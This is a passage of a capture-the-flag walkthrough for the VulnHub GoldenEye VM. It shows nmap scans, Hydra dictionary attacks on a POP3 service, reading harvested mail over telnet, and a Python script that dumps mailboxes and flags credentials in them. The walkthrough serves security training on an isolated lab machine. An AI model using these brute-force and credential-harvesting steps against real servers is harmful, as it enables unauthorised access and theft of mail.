GoldenEYEv1 || VulnHub Walkthrough


Hello everyone! Welcome to my latest video. Today, we'll be exploring a vulnerable machine called "GoldenEye", classified as "Intermediate" in terms of difficulty.

This machine is inspired by the iconic James Bond film (and even better N64 game) GoldenEye. Our objective is to gain root access and capture the secret GoldenEye codes in the flag.txt file. 


To get started, visit the VulnHub website and download the vulnerable image. If you're new to VulnHub, check out our VulnHub playlist for some helpful tutorials.

VulnHub: Vulnerable By Design

VulnHub provides a collection of pre-built vulnerable machine images. The resource is designed to help you practice penetration testing and vulnerability assessment skills on a variety of systems, safely and legally, on your own hardware.



Setting Up

Once you've downloaded the image, the next step is setting up the server in VirtualBox. 

This involves importing the OVA file into VirtualBox with the "Import Appliance" feature. Here's how to do it:

To import an OVA image, navigate to the menu bar and click on "File". From the dropdown menu, select "Import Appliance".

This will open the "Appliance to Import" window, where you can browse and select the OVA image from your local storage.

Click "Next", and the "Appliance Settings" window will appear. Review the appliance details and settings.

You can adjust them as needed. Click "Finish" to start the import. Once the import is finished, you'll see the "GoldenEye-v1" vulnerable machine listed in the VirtualBox Manager under the VulnHub group.

Select the virtual machine, go to "Settings", and change the network adapter to "Host-only adapter".

Both your Kali Linux machine (used for the attack) and the vulnerable machine must sit on the same network, so attach both to the same host-only adapter. This also keeps the deliberately vulnerable VM isolated from your LAN and from the internet.

Now, it’s time to start the VM, and you'll notice that our Vulnerable Machine is ready, with a login prompt awaiting. 

Let's dive into the fun!


Enumeration

Identify the IP address

The first step in our attack is enumeration, beginning with the IP address of the target. NetDiscover finds hosts by sending ARP requests, so it only sees machines on the same layer-2 segment (here, the host-only network) and needs root to open raw sockets. Open a terminal and run "netdiscover -i" followed by the network interface name, which in this case is "eth1".

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.125.0/16   |   Screen View: Unique Hosts                                                 
                                                                                                                      
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                      
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:0d      1      60  Unknown vendor                                                     
 192.168.95.2    08:00:27:fc:8a:4c      1      60  PCS Systemtechnik GmbH                                             
 192.168.95.19   08:00:27:70:49:72      1      60  PCS Systemtechnik GmbH   

From the scan results, we've obtained our target IP address: " 192.168.95.19 ."


Scan the Network to identify open ports

Next, we'll scan the target to identify open ports, a crucial step in the enumeration process: it shows us the attack surface and lets us plan targeted attacks. We'll use the popular Nmap tool for this task. Run the following command:

nmap -sC -sV {Specify the IP address}

In this command,

  • "-sC" performs a script scan using the default set of NSE scripts,
  • "-sV" enables version detection, so we learn which service and version sits behind each open port.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 19:52 IST
Nmap scan report for 192.168.95.19
Host is up (0.00091s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.10 seconds
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$

After completing the scan, we discovered two open ports (note that nmap scans only the 1,000 most common TCP ports by default, which matters later):

  • Port 25/TCP: Simple Mail Transfer Protocol (SMTP). The scan identified the service as "Postfix smtpd" and listed its advertised extensions: PIPELINING (multiple commands may be sent without waiting for each response), SIZE 10240000 (messages up to roughly 10 MB), STARTTLS (TLS is available but optional, so plaintext sessions are still accepted) and VRFY, which lets a remote client ask whether a local mailbox exists and is therefore a classic user-enumeration vector.
  • Port 80/TCP: HTTP. The scan identified the service as "Apache httpd 2.4.7 ((Ubuntu))" and the page title as "GoldenEye Primary Admin Server", so the host runs Ubuntu and presents itself as the GoldenEye admin server.


Web Enumeration

Now, let's explore the content of the website running on Port 80. To look at the contents ourselves, open a web browser of your choice, and navigate to the target’s IP address in the URL bar at the top of the window.

Upon exploring the webpage, it appears to be a "Severnaya Auxiliary Control Station", suggesting it might be a control panel for a system named "Severnaya".

The login page displays a warning: "TOP SECRET ACCESS" and provides server details: 

  • Server Name: GoldenEye
  • User: Unknown.

The login page instructs users to navigate to "/sev-home/" to proceed. Let's see what awaits us there.

Upon navigating to " /sev-home/ ", we encounter a login prompt requesting a username and password. Unfortunately, we lack the necessary credentials to proceed, so our first priority is to find the credentials.

Before resorting to a password attack, let's look for clues in what the server already gives us. The browser's developer tools expose the login page's underlying HTML: right-click anywhere on the page and select "View Page Source".

Within the source code, we discover a JavaScript file named "terminal.js" referenced from a script tag. Client-side scripts often carry leftover developer comments, so this file might contain valuable clues.

Let's examine the contents of "terminal.js" to see if the developer left any hints for authorized access.

The file contains a comment addressed to a legitimate user, Boris, with what is meant to be his password, written as a long run of HTML entities (the "&#NN;" numeric character reference form) rather than plain text. This is encoding, not encryption: anything that renders HTML turns it back into readable text, which is why simply pasting the string into a search box decodes it on the spot to "InvincibleHack3r".

To verify, paste the same string into any online HTML entity encoder/decoder, which confirms the same result.
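The decoding step above is worth automating, because a hidden string like this is easy to miss in a long script. The following is an added example for this walkthrough, not code from the original page or from the VM's terminal.js: it scans a file for runs of HTML numeric character references and decodes them with the same transformation a browser applies. The sample JavaScript embedded in it is constructed by re-encoding the value the page reports, so the shape of the real comment is an assumption.

```python
"""entities.py: find runs of HTML numeric character references in a script
file and decode them.

Added example for this walkthrough, not code from the original page. The
sample JavaScript below is constructed: it re-encodes the value the page
reports ("InvincibleHack3r") the way such a comment would look, and is not
quoted from the VM's terminal.js.
"""
import html
import re
import sys

# A run of at least MIN_RUN consecutive references (&#73; or &#x49;). Single
# entities are normal in markup; a long run is a string someone hid.
MIN_RUN = 4
ENTITY_RUN = re.compile(r"(?:&#(?:x[0-9a-fA-F]+|[0-9]+);){%d,}" % MIN_RUN)


def encode_entities(text):
    """What the developer did: each character as a decimal reference."""
    return "".join(f"&#{ord(ch)};" for ch in text)


def find_entity_strings(text):
    """Return (encoded, decoded) pairs for every long run of references.

    html.unescape is the same transformation a browser or search box applies
    when it renders the string, which is why the password 'decoded itself'.
    """
    return [(m.group(0), html.unescape(m.group(0))) for m in ENTITY_RUN.finditer(text)]


# Constructed stand-in for terminal.js (assumption about its shape).
SAMPLE_JS = (
    "// boris, your new password is below. Decode it before logging in.\n"
    "// " + encode_entities("InvincibleHack3r") + "\n"
    "var output = document.getElementById('output');\n"
    "if (a &#38; b) { /* a lone entity: not flagged */ }\n"
)


def main():
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    else:
        data = SAMPLE_JS
    for encoded, decoded in find_entity_strings(data):
        print(f"{decoded!r}  <-  {encoded[:48]}{'...' if len(encoded) > 48 else ''}")


if __name__ == "__main__":
    main()
```

Run it with no arguments to see the constructed sample decoded, or pass the path of a downloaded terminal.js (for example after "wget http://192.168.95.19/terminal.js") to scan the real file. The minimum run length keeps ordinary single entities in markup from being reported.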



Now that we have a valid username and password, it's time to log in to "/sev-home/" as we attempted earlier.

Upon accessing, it shows the description of GoldenEye.

GoldenEye is a Top-secret Soviet orbital weapons project . Since you have access, you definitely hold Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO). Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system.

Remember, since security by obscurity is very effective, we have configured our POP3 service to run on a very high non-default port.

The description mentions that the POP3 service runs on a "very high non-default port". That is the hint we need to locate the service; a mailbox is a likely place to find further credentials, so it can help in gaining a foothold on the server. Note that our first scan only covered nmap's default top 1,000 ports, which is exactly what a port like that evades.


Scan the Network to find the POP3 service

To find out whether a POP3 service is listening, we run nmap again, this time against all 65,535 TCP ports with "-p-" rather than the default top 1,000, since a high port would not have shown up in the first scan.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.19 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 21:31 IST
Nmap scan report for 192.168.95.19
Host is up (0.0017s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) PIPELINING USER AUTH-RESP-CODE UIDL CAPA TOP RESP-CODES
55007/tcp open  pop3     Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_pop3-capabilities: AUTH-RESP-CODE RESP-CODES SASL(PLAIN) PIPELINING UIDL USER CAPA TOP STLS
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.12 seconds
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Upon completion of the full port scan, we discovered two additional open ports, both served by the Dovecot POP3 daemon.

  • 55006/TCP: reported as "ssl/pop3", i.e. POP3 over implicit TLS (the equivalent of the standard POP3S port 995). The client must start a TLS handshake immediately after connecting; a plaintext client gets disconnected.
  • 55007/TCP: reported as "pop3", i.e. plaintext POP3 (the equivalent of the standard port 110). The capability list shows "STLS", so a client may upgrade to TLS, but nothing forces it to, and "USER" and "SASL(PLAIN)" mean passwords can travel in the clear.

POP3 is a standard protocol used to download emails from a mail server to a local email client (such as Thunderbird or Outlook). It normally uses port 110 (995 for POP3S), but here it runs on the non-standard ports 55006 and 55007. Both ports present a certificate issued for commonName=localhost, so a TLS client will fail hostname verification unless told to ignore it.


User Enumeration for POP3 Service: Targeting User 'Boris'

Since a POP3 service is running, we can connect to it and read the mail stored for any user whose password we hold. A plain TCP client such as the Telnet client (or netcat) is enough to speak the text protocol by hand. Here's how to proceed:

Open your terminal and type the following command:

telnet {IP Address} {Target POP3 Port}

In this case, we will first attempt to connect on port 55006 and use the previously found credentials (mail user names on this box are lowercase):

  • username:  boris
  • password:  InvincibleHack3r

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55006
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
USER boris
Connection closed by foreign host.
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

The connection is closed by the foreign host. This does not mean port 55006 is unusable: nmap reported it as "ssl/pop3", so the server expects a TLS handshake and drops a client that sends plaintext. A TLS-capable client (for example openssl s_client) could use it, but since the same mailbox is reachable without TLS on 55007 we take the simpler route.

We have another open port 55007, so we will use this one to establish a connection.

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55007
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System

Upon successfully connecting to port 55007, the server displays a “ +OK ” confirmation, indicating that we have accessed the GoldenEye POP3 Electronic-Mail System.

USER boris
+OK

After inputting the username boris, the server responds with +OK. Note that this is not confirmation that the account exists: Dovecot accepts any USER and only evaluates the pair when PASS arrives, so the USER response cannot be used to enumerate users. Next, input the password InvincibleHack3r.

PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.

The server responds with -ERR [AUTH] Authentication failed, indicating that this username/password pair is not valid for the POP3 service: the web password was not reused for mail.

Since we have a likely username but no valid password, let's run a password attack against the POP3 service for the user boris. For this we use Hydra, a network login brute-forcer.

hydra -l <specify the username> -P <path-to-wordlist> -f {Target Host IP} -s <Port> <specify the Protocols to attack> -t  <specify number of tasks>

Where:

  • -l specifies the known username, boris.
  • -P specifies the path to the wordlist ( fasttrack.txt ) containing candidate passwords.
  • -f tells Hydra to stop after the first valid login is found.
  • 192.168.95.19 is the target IP address.
  • -s (lowercase; uppercase -S would request SSL) specifies the port, 55007.
  • pop3 is the protocol module to attack.
  • -t sets the number of parallel connections (Hydra defaults to 16). A higher task count finishes a small list faster; keep an eye on the target, since a real mail server may rate-limit or lock accounts, and start with a small wordlist as Hydra itself advises.

┌──(kali㉿kali)-[~]
└─$ hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.95.19 -s 55007 pop3 -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-24 22:49:01
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 262 login tries (l:1/p:262), ~14 tries per task
[DATA] attacking pop3://192.168.95.19:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 162 to do in 00:02h, 20 active
[55007][pop3] host: 192.168.95.19   login: boris   password: secret1!
[STATUS] attack finished for 192.168.95.19 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-24 22:51:39
                                                                                                                       
┌──(kali㉿kali)-[~]
└─$

With -f Hydra stopped at the first valid pair, having found the password for boris on the POP3 service: secret1!. A password this weak fell to a 262-word list in under three minutes.

Now that we have the password, let's continue to establish the POP3 connection, which was previously disrupted due to the lack of a valid password.

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55007
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.

Upon inputting the password, the server responds with +OK Logged in . This indicates that we have successfully logged in to the POP3 service.

Now it's time to read the mail. First, run the LIST command, which returns each message number with its size in octets.

LIST
+OK 3 messages:
1 544
2 373
3 921
.

The server responds with +OK 3 messages, indicating that there are three messages available.

To read the content of any of these messages, run the RETR command followed by the sequence number of the message.

RETR 1
+OK 544 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.

The RETR 1 command retrieves the first email, headers and body, terminated by a line containing a single dot. The body carries no credentials, but the admin's statement is worth noting.

The admin says mail is not scanned for security risks because the admins are trusted. In practice that means sensitive material, credentials included, can move through these mailboxes unchecked, so the remaining messages and mailboxes deserve a close read.

Let's proceed with further actions by retrieving additional emails to gather more information. Analyze the contents of other emails for any actionable intelligence or further security insights.

RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.

The retrieved email contains a concise message: 

"Boris, I can break your codes!"

This statement suggests that the sender, identified as natalya@ubuntu , claims the capability or intention to decrypt Boris's codes.
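The manual USER/PASS/LIST/RETR exchange above is repeated for every mailbox on this box (Natalya's and Doak's follow later), so it pays to script it. The following is an added example for this walkthrough, not code from the original page: a small Python client that logs in, retrieves every message and flags credential-looking lines in the bodies. It assumes the Dovecot layout from the nmap output (plaintext POP3 on 55007, implicit TLS on 55006 with a certificate for "localhost"), and the "username: ..." / "password: ..." pattern it looks for is an assumption about how admins write credentials in mail.

```python
"""pop3dump.py: log in to a POP3 mailbox, RETR every message and flag
credential-looking lines in the bodies.

Added example for this walkthrough (not code from the original page or the
GoldenEye VM). Assumes the Dovecot layout from the nmap output: plaintext
POP3 on 55007, POP3 over implicit TLS on 55006 with a certificate for
"localhost". The credential pattern is a guess at how admins write creds
in mail, modelled on "username: ..." / "password: ..." lines.
"""
import email
import poplib
import re
import ssl
import sys

# "username: xenia" / "password: RCP90rulez!" style lines, one per line.
CRED_RE = re.compile(
    r"^\s*(username|user|login|password|pass|passwd)\s*:\s*(\S+)\s*$",
    re.IGNORECASE | re.MULTILINE,
)
# Local part of any address in From / Return-Path: a candidate user name.
LOCAL_PART_RE = re.compile(r"([a-z0-9_.-]+)@")


def connect(host, port, user, password, tls=False):
    """Open and authenticate a POP3 session.

    tls=True is for the implicit-TLS port (55006); a plaintext client there
    just sees "Connection closed by foreign host".
    """
    if tls:
        ctx = ssl.create_default_context()
        # Lab box only: the cert is for CN=localhost, so verification would
        # fail. Never disable this against a production server.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        conn = poplib.POP3_SSL(host, port, timeout=10, context=ctx)
    else:
        conn = poplib.POP3(host, port, timeout=10)
    # Dovecot answers +OK to any USER; only PASS decides, and poplib raises
    # poplib.error_proto on "-ERR [AUTH] Authentication failed."
    conn.user(user)
    conn.pass_(password)
    return conn


def fetch_all(conn):
    """LIST the mailbox, then RETR each message as raw bytes (dot-unstuffed)."""
    _, listing, _ = conn.list()            # entries look like b"1 544"
    messages = []
    for entry in listing:
        num = int(entry.split()[0])
        _, lines, _ = conn.retr(num)
        messages.append(b"\r\n".join(lines))
    return messages


def summarize(raw):
    """Pick out sender, date, body text, local user names and credentials."""
    msg = email.message_from_bytes(raw)
    body = msg.get_payload(decode=True) or b""
    text = body.decode("utf-8", errors="replace")
    creds = {key.lower(): value for key, value in CRED_RE.findall(text)}
    headers = " ".join(msg.get_all("From", []) + msg.get_all("Return-Path", []))
    users = sorted(set(LOCAL_PART_RE.findall(headers.lower())))
    return {
        "from": msg.get("From"),
        "date": msg.get("Date"),
        "body": text.strip(),
        "users": users,
        "creds": creds,
    }


def main():
    if len(sys.argv) != 5:
        sys.exit("usage: pop3dump.py HOST PORT USER PASSWORD")
    host, port, user, password = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
    conn = connect(host, port, user, password, tls=(port == 55006))
    try:
        for num, raw in enumerate(fetch_all(conn), start=1):
            info = summarize(raw)
            print(f"--- message {num} from {info['from']} ({info['date']})")
            print(info["body"])
            if info["users"]:
                print("candidate users:", ", ".join(info["users"]))
            if info["creds"]:
                print("!! credentials:", info["creds"])
    finally:
        conn.quit()


if __name__ == "__main__":
    main()
```

Usage against the box is "python3 pop3dump.py 192.168.95.19 55007 boris 'secret1!'"; passing 55006 instead switches the client to implicit TLS, which is what the telnet attempt on that port was missing. The sender list doubles as a user-enumeration source: every local part seen in From or Return-Path is a name worth feeding back into Hydra.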


User Enumeration for POP3 Service: Targeting User 'Natalya'

Upon reviewing the emails, while no immediate valuable information was found, it became apparent that Natalya appears to be another username associated with the system.

Since we have identified the username natalya but lack the corresponding password, the next logical step is to attempt a password attack using Hydra.

┌──(kali㉿kali)-[~]
└─$ hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.95.19 -s 55007 pop3 -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-24 22:58:00
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 262 login tries (l:1/p:262), ~14 tries per task
[DATA] attacking pop3://192.168.95.19:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 162 to do in 00:02h, 20 active
[55007][pop3] host: 192.168.95.19   login: natalya   password: bird
[STATUS] attack finished for 192.168.95.19 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-24 23:00:17
                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Hydra found the password for natalya on the POP3 service: bird. Like secret1!, it sits in a tiny wordlist, and it gives us unauthorized access to her mailbox.

Since we have another valid username and password let’s establish a connection against POP3.

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55007                       
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.

Login was successful. Now, list the mailbox with the LIST command.

LIST
+OK 2 messages:
1 631
2 1048
.

The server responds with +OK 2 messages , indicating that there are 2 messages available.

To read the content of these messages, run the RETR command followed by the sequence number of the message.

RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.

The RETR 1 command retrieves the first email.

Three things are useful here: mail on this box is sent from root@ubuntu, so root is a local account that sends mail; natalya is the GNO supervisor who will be assigned students, and is therefore likely to receive account details by mail; and the warning about the Janus syndicate shows the admins expect network breaches yet, as the previous mailbox revealed, still do not scan internal mail.


Let's retrieve and analyze the 2nd message from Natalya's mailbox. 

RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

This email hands us far more than the previous ones:

  • Credentials for a new user, xenia (password RCP90rulez!), sent in the clear over internal mail, which we have just read from a mailbox protected by a dictionary password over plaintext POP3.
  • An internal URL, severnaya-station.com/gnocertdir, that is reachable under that host name, which is why Natalya is told to add the name to her hosts file when working off-network.
  • Since Natalya uses Linux, she is told to point this server's IP to severnaya-station.com in /etc/hosts, and we do the same on our attacking machine.

From the analysis of the message, the first thing we have to do is update the hosts file.

To reach the internal URL, we map the target's IP address to severnaya-station.com in our own /etc/hosts. Open the file in a text editor with root permissions and add a line of the form "192.168.95.19 severnaya-station.com" (IP address, whitespace, host name). Afterwards "getent hosts severnaya-station.com" should print the target's IP, confirming the mapping took effect.

┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts

Once the "hosts" file is updated, we can visit the internal URL to proceed with any necessary tasks or further investigations. 

On the web browser, navigate to http://severnaya-station.com/gnocertdir.

Upon navigating to the internal URL, we see the dashboard for "GoldenEye Operators Training - Moodle". This page displays available courses and other relevant information.


In the upper left corner, you will find a login button. Click on it.

After clicking "Log in", we are redirected to the login area. Here you can either log in with valid credentials (username and password) or, if the option is enabled, log in as a guest.

In our previous steps, we discovered the username and password for xenia. Let's use these credentials to log in and explore further.

Upon successful login, the webpage displays the GoldenEye operator training portal.

Once logged in, you will see the following:

  • A welcome message on the main page.
  • A calendar component on the right side of the page, and a navigation menu on the left with links to the sections of the portal: Home, My Courses, My Profile, Settings, and My Messages.
  • A logout link in the top right corner next to the username "Xenia", indicating who is currently logged in.
  • A new message notification from Dr. Doak. Clicking on it should display the message content.

Based on these elements, this webpage is a Moodle portal for GoldenEye operator training: a central place for trainees to access course materials, manage their profiles, and message instructors or other trainees. Moodle is a widely deployed application, so identifying its exact version is worth doing at this point.


To open the inbox, go to "My Profile" in the navigation menu and click on "Messages". An unread message from Dr. Doak is displayed.

Click on it to read the content. The message from Dr. Doak provides a hint:

His email username is "doak".


User Enumeration for POP3 Service: Targeting User 'Doak'

With the username "doak" discovered (mail accounts on this box use lowercase names), we repeat the Hydra password attack against the POP3 service for this user.

┌──(kali㉿kali)-[~]
└─$ hydra -l doak -P /usr/share/wordlists/fasttrack.txt -s 55007 -f -t 20 192.168.95.19 pop3                        
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-24 23:33:53
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 262 login tries (l:1/p:262), ~14 tries per task
[DATA] attacking pop3://192.168.95.19:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 162 to do in 00:02h, 20 active
[55007][pop3] host: 192.168.95.19   login: doak   password: goat
[STATUS] attack finished for 192.168.95.19 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-24 23:36:12
                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Hydra finds that the password for "doak" is "goat". Let's use it to log in to the POP3 service with telnet and check for messages.

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.95.19 55007
Trying 192.168.95.19...
Connected to 192.168.95.19.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.

Run the LIST command to see if there are any messages. 

LIST
+OK 1 messages:
1 606
.

The server responds with +OK 1 message , indicating there is one message. Let’s retrieve the message using the RETR command.

RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

The message from Doak contains a username and password for the training site. Note that they differ from his mail credentials (dr_doak rather than doak), so the site and the mail server keep separate accounts.

With these credentials, we can log in to the training portal. First, log out of xenia's session, then log in with the username and password from Doak's message. After a successful login, a dashboard similar to the previous one appears.


Now, let's find out if there are any clues left for further escalation.

Navigating to "My Profile" in the navigation menu and opening its dropdown shows several options. One of them, "My Private Files", looks particularly interesting.

Select "My Private Files" to look for files that might provide further clues. In the directory there is a folder named "for James". Open it, and a text file named "s3cret.txt" appears.

This text file could contain information that leads to further escalation. Clicking on the file downloads it.

The contents of "s3cret.txt" provide two clues:

  • Admin credentials were captured in clear text, but the author says they cannot be added to this file because of security scans of the web apps on the GoldenEye servers; instead the message points to a file at /dir007key/for-007.jpg. That path is the next lead.
  • There is also a remark about the RCP-90 weapon and "License to Kill", which reads as a personal note rather than a clue.

Investigate Images to find a clue

Next, we need to access the file. To do this, navigate to the specified directory /dir007key/ after the URL http://192.168.95.19 and locate the file for-007.jpg .

I found an image there, so let's examine its contents for any embedded data or further clues. First, we need to download it. We can use the wget tool for this purpose.

┌──(kali㉿kali)-[~]
└─$ wget http://192.168.95.19/dir007key/for-007.jpg
--2024-05-24 23:44:18--  http://192.168.95.19/dir007key/for-007.jpg
Connecting to 192.168.95.19:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’

for-007.jpg                   100%[================================================>]  14.55K  --.-KB/s    in 0s      

2024-05-24 23:44:18 (752 MB/s) - ‘for-007.jpg’ saved [14896/14896]

                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Next, let's investigate the image using exiftool .

┌──(kali㉿kali)-[~]
└─$ exiftool for-007.jpg
ExifTool Version Number         : 12.76
File Name                       : for-007.jpg
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2018:04:25 06:10:02+05:30
File Access Date/Time           : 2024:05:24 23:44:28+05:30
File Inode Change Date/Time     : 2024:05:24 23:44:18+05:30
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
